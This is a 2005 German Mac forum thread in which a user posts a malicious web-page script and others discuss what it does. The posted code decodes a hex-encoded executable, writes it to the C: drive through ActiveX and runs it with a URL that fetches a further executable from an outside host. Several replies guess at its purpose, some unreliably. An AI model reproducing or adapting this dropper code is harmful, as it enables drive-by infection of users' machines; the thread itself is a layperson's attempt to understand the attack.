Benutzerdefinierte Suche

wozu die Schleife ?

  1. etrance

    etrance Thread StarterMacUser Mitglied

    Mitglied seit:
    08.08.2004
    Beiträge:
    141
    Zustimmungen:
    0
    kann jemand mir erklären wie die schleife funktioniert ? habe zufällig
    bei sürfen auf Desktop bekommt ...wäre unter Windows wahrscheinlich
    zum ausführen gekommen :)

    <script language=vbscript>
    c0 = "4D5A90000300000004000000504500004C01020046534721..sehr lang noch :) .."
    h0 = ""
    i = 1
    Do While i < Len(c0)
    c = chr(cint("&h" & mid(c0, i, 2)))
    h0 = h0 & c
    i = i + 2
    Loop
    </script>
     
    etrance, 05.02.2005
  2. Stan Marsh

    Stan MarshMacUser Mitglied

    Mitglied seit:
    05.02.2005
    Beiträge:
    256
    Zustimmungen:
    12
    Falsches Forum, du bist hier in PHP nicht in VB ;)

    Die Schleife: Während i kleiner als Len(c0) (kenne mich mit VB nicht aus, wird wohl Zeichenkettenlänge sein oder so) ist, wird die Schleife ausgeführt.
     
    Stan Marsh, 05.02.2005
  3. oSIRus

    oSIRusMacUser Mitglied

    Mitglied seit:
    16.09.2004
    Beiträge:
    2.721
    Zustimmungen:
    0
    also ich denke mal das dient primär dazu deinen rechner auszubremsen.
     
    oSIRus, 05.02.2005
  4. SaC

    SaCMacUser Mitglied

    Mitglied seit:
    10.10.2004
    Beiträge:
    386
    Zustimmungen:
    0
    Irgendwie wird da die Zeichenkette c0 zerschnipselt und dann in der Variable h0 wieder zusammengesetzt. Fragt mich aber nicht was für einen Sinn das haben soll...
     
  5. etrance

    etrance Thread StarterMacUser Mitglied

    Mitglied seit:
    08.08.2004
    Beiträge:
    141
    Zustimmungen:
    0
    ich kenne mit Scripten nicht aus aber ist es so einfach eine SystemObject zuerzeugen und dann auszuführen ?
    Die PHP Datei was ich bekomme habe sind noch mehr drin habe nur ausschnitt gepostet.
    Wenn ich richtig den code verstanden habe ist dass ein Textfile mit den Endung .exe erzeugen können :( und mit code gefuttet wird

    var fs = new ActiveXObject('Scripting.FileSystemObject');
    var ts = fs.CreateTextFile("c:\\ntldr.exe", true, false);
    ts.Write(h0);
    ts.Close();
    var wsh = new ActiveXObject('WScript.Shell');
    wsh.Run("c:\\ntldr.exe http://www.foxik.com/hb/dllwrap.exe",0);
    window.close();

    nach Info im Internet ist es ein Wurm. Was macht wohl dllwrap.exe ?? hätte gern jetzt VPC um es zuprobieren
     
    etrance, 05.02.2005
  6. SaC

    SaCMacUser Mitglied

    Mitglied seit:
    10.10.2004
    Beiträge:
    386
    Zustimmungen:
    0
    Das ist wohlgemerkt kein PHP, sondern VisualBasic Script, eine von MS entwickelte Skriptsprache, die primär dazu dient Sicherheitslücken zu öffnen :D

    Damit das Ding funktioniert muss man
    a) Windows benutzen
    b) mit dem IE surfen
    c) die Sicherheitseinstellungen auf einem SEHR niedrigen Level haben

    Du hast den Code richtig verstanden. Es wird eine Datei direkt am Laufwerk C mit dem Namen "ntldr.exe" erzeugt.
    In die wird dann der Inhalt des oben erzeugten Strings geschrieben (ist das Hex oder was?)
    Offenbar ist die Datei dazu bestimmt auf dem Windows Scripting Host (WSH) ausgeführt zu werden.
    Beim ausführen (wsh.Run) wird ihr zusätzlich eine Webadresse als Parameter übergeben. Wahrscheinlich holt sich das Programm von dort dann die "dllwrap.exe" auf die Festplatte. Möglicherweise werden so einige der Systembibliotheken (DLLs) ersetzt - reine Vermutung.

    So, ich hoffe das war wenigstens ein Bisschen informativ :D
    Für Fehler übernehme ich keine Haftung weil es schon ewig her ist, dass ich unter Windows was programmiert hab (und überhaupt unter VB - is ja ekelhaft :p)
     
  7. etrance

    etrance Thread StarterMacUser Mitglied

    Mitglied seit:
    08.08.2004
    Beiträge:
    141
    Zustimmungen:
    0
    so schleudern die also ihre Würmer ..läst javascript oder sogar JAva auch so leicht ausführtbare Files auf Locale Platte erzeugern? (OS X)

    Gruss etrance
     
    etrance, 06.02.2005
  8. Hilarious

    HilariousMacUser Mitglied

    Mitglied seit:
    25.11.2004
    Beiträge:
    2.161
    Zustimmungen:
    5
    JavaScript und Java haben zwar einige kleinere Gemeinsamkeiten, aber JavaScript wurde hauptsächlich aus Marketinggründen seinerzeit so getauft. Sun wollte damals die plattformübergreifende, objektorientierte (das war Anfang der 90er irre hip) Programmiersprache Java nach vorn bringen. Eine ursprünglich vielversprechende Sache, stellte sich jedoch schnell heraus, dass Java für die Integration in einem Netscape-Browser den Rahmen ein wenig gesprengt hätte.

    Daher musste JavaScript (oder besser ECMA-Script) herhalten, ein wenig Dynamik in die zustandslosen Darstellungen von Text per HTML zu bringen. Zu Deiner Beruhigung: Im Prinzip ist es mit reinem JavaScript nicht ohne Weiteres möglich, lokale Dateien beliebigen Inhaltes auf der Festplatte des Nutzers zu schreiben, da das oberste Objekt, was JavaScript kennt und "sieht", das Browserfenster ist. Eine Festplatte ist da gar nicht in "Sicht".

    Dann kam Redmond mit ActiveX-Controls, VBScript und dem ganzen Kram, um genau die oben beschriebene Hürde zu überspringen. Mit ActiveX-Controls kann der Programmierer so gut wie alles, was das Betriebssystem auch kann. Zwar gibt es einige Sicherheitsbeschränkungen, aber diese sind immer erst Monate nach den jeweiligen Meldungen erschienen und gleichen Leukoplast auf offenen Knochenbrüchen.

    Jetzt die gute Nachricht: Diese Form der Active-X-Controls, die so tief Zugriff auf die Hardware ermöglichen, gibt es nur in Verbindung mit Windows-Systemen.
     
    Hilarious, 06.02.2005
  9. oSIRus

    oSIRusMacUser Mitglied

    Mitglied seit:
    16.09.2004
    Beiträge:
    2.721
    Zustimmungen:
    0
    Java braucht für Zugriffe auf lokale Ressourcen immer ein Sicherheitszertifikat, was vom user akzeptiert werden muß.
     
    oSIRus, 06.02.2005
  10. michanismus

    michanismusMacUser Mitglied

    Mitglied seit:
    23.08.2004
    Beiträge:
    434
    Zustimmungen:
    0
    das ist ein dialer! das skript ist sicher noch ein paar zeilen umfangreicher, denke ich...
    auf jeden fall wird auf deriner platte (falls du windows user bist und das erlaubt hast)
    eine datei geschrieben (der dialer) und ausgeführt. der lange string dort sind hex codes, welche den exakten kompilierten programmcode wiederspiegeln. so machen das die skript kiddies um an einigen älteren antiviren programmen vorbeizukommen.
     
    michanismus, 08.02.2005
Die Seite wird geladen...
Ähnliche Themen - wozu Schleife
  1. leo-magic
    Antworten:
    13
    Aufrufe:
    1.856
    rm -r *
    06.01.2011
  2. cym
    Antworten:
    4
    Aufrufe:
    553
    TheFallenAngel
    17.12.2006
  3. oconner
    Antworten:
    14
    Aufrufe:
    1.127